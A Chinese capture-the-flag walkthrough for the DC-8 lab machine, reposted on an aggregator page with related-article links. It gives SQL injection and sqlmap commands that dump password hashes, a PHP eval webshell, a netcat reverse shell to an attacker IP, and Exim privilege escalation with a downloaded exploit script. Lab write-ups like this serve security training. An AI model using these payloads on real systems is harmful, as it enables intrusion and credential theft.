当前位置：首页 > news >正文

DC系列靶机-DC8

news 2025/7/7 6:04:57

一，环境的搭建

VM17 官网下载

kali 2023.4版 https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2023.4/

靶场文件 https://download.vulnhub.com/dc/DC-8.zip

二，攻略

首先nmap一通扫；

扫描主机IP和端口；

靶机的地址是：192.168.20.150/24

仍然是只开放了80端口和22端口；

可以尝试一下目录扫描；

一眼看过去和dc7的有些类似；CMS貌似是Drupal；

点击过程中，后面的id=1，会发生变化；

这里最有可能出现的就是SQL注入；

尝试寻找注入点；

http://192.168.20.150/?nid=1%27%20or%201=1
测试SQL注入：' or 1=1--+

明显存在SQL注入漏洞；

接下来直接sqlmap跑一下；

sqlmap -u "192.168.20.150/?nid=1"

跑一下数据库；

sqlmap -u "192.168.20.150/?nid=1" --dbs

有两个数据库；

由于information_schema是MySQL的系统库，访问d7db这个数据库；

sqlmap -u "192.168.20.150/?nid=1" -D d7db --tables

访问users表；

sqlmap -u "192.168.20.150/?nid=1" --dbs -D d7db --tables -T users --columns

sqlmap -u "192.168.20.150/?nid=1" --dbs  -D d7db --tables -T users --columns -C name,pass --dump

得到两条数据；用户名和密码，不过是加密的；

+--------+---------------------------------------------------------+
| name   | pass                                                    |
+--------+---------------------------------------------------------+
| admin  | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| john   | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+--------+---------------------------------------------------------+

这里可以尝试使用工具去破解密码；

在Kali Linux中，John工具被广泛应用于密码破解任务。例如，它可以用来破解Kali系统中的用户密码。具体步骤包括使用John提供的unshadow命令合并/etc/passwd和/etc/shadow的数据，然后使用John工具对生成的文件进行破解。如果遇到“未加载密码哈希”的错误，可以通过更换编译指令或手动指定加密算法来解决。此外，John工具也可以用于破解受密码保护的Zip压缩文件，通过使用zip2john工具将zip文件转换为John能够理解的哈希格式，然后进行破解。

成功破解出了一组密码；

john:turtle

尝试登录；

登录成功；

这里存在一个上传并且解析php代码的地方；

上传一句话；

<?php @eval($_POST['cmd']);?>

上传之后蚁剑无法连接；

尝试直接反弹shell；

<p>Thanks for taking the time to contact us. We shall be in contact soon.</p>
<?php
system("nc -e /bin/bash 192.168.20.151 4444");
?>

反弹shell连接成功；

开始进行信息收集；

首先查看passwd；

存在一个其他的用户；

sudo -l

需要密码；

find / -perm -u=s -type f 2>/dev/null
#从根目录开始查找所有具有SUID权限的普通文件

尝试suid提权；

Exim是一个MTA（Mail Transfer Agent），它的主要职责是发送、接收和路由电子邮件。作为一个邮件传输代理，Exim可以在不同的邮件服务器之间传递邮件，确保邮件能够正确地到达目的地。

查看版本；

尝试搜索一下历史的漏洞；

根据这个版本，选择46996.sh的脚本文件来提权；

searchsploit exim 4 
#搜索历史的漏洞
searchsploit -m 46996.sh
vim 46996.sh
:set ff?
#查看是否为在Linux上运行的
:set ff=unix
#强制转化

保证文件可以在Linux上运行；

接下来将文件拷贝过去；

这里可以采用和dc5一样的做法；使用python搭建一个简易的服务器，将要下载的文件挂接过去；

python3 -m http.server 80

然后开始下载文件；

wget -c 192.168.20.151:80/46996.sh

chmod 777 46996.sh
./46996.sh -m netcat
id
cd /root
cat flag.txt

在root目录下拿到最终的flag；

三，结论

对于?id=类似于这种的，尝试sql注入；

对于sql注入的自动化工具sqlmap的使用；

破解/etc/shadow中密码的工具john，可以尝试破解密码；

对于上传点，可以有不同的方式getshell，可以上传一句话，也可以直接反弹shell；

常见的提权思路；

对文件的操作过程中，选择在/tmp目录下；

DC系列靶机-DC8

一，环境的搭建

二，攻略

三，结论

相关文章：

DC系列靶机-DC8

重构复杂简单变量之用对象替换数据值

我国首个自主可控的操作系统——华为原生鸿蒙操作系统正式发布

Spring Boot技术栈在论坛网站开发中的应用

Fast-LLM：加速大型语言模型训练的开源库

物理安全（Physical Security）

Go语言开发环境搭建

嵌入式硬件设计：技术与实践

vue中使用echarts，导入JSON数据画图

【C++篇】探索STL之美：熟悉使用String类

ETLCloud搭配MySQL | 让关系型数据库更智能

Java 开发——（上篇）从零开始搭建后端基础项目 Spring Boot 3 + MybatisPlus

Psychophysiology：脑-心交互如何影响个体的情绪体验？

FunASR实时语音识别内网部署 | 无网络环境中的实时语音识别 | 实时语音识别

【设计模式-状态模式】

【代码随想录Day50】图论Part02

帝国CMS 内容页调用上一篇下一篇的方法（精华汇总）

（7）c++复合数据类型之数组

2.1 ＞ Shell 是什么、如何更熟练的使用 Bash Shell

YOLO V3 网络构架解析

Java 语言特性(面试系列1)

VB.net复制Ntag213卡写入UID

什么是库存周转？如何用进销存系统提高库存周转率？

Springcloud：Eureka 高可用集群搭建实战（服务注册与发现的底层原理与避坑指南）

用docker来安装部署freeswitch记录

CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)

【SSH疑难排查】轻松解决新版OpenSSH连接旧服务器的“no matching...“系列算法协商失败问题

给网站添加live2d看板娘

DBLP数据库是什么？

使用SSE解决获取状态不一致问题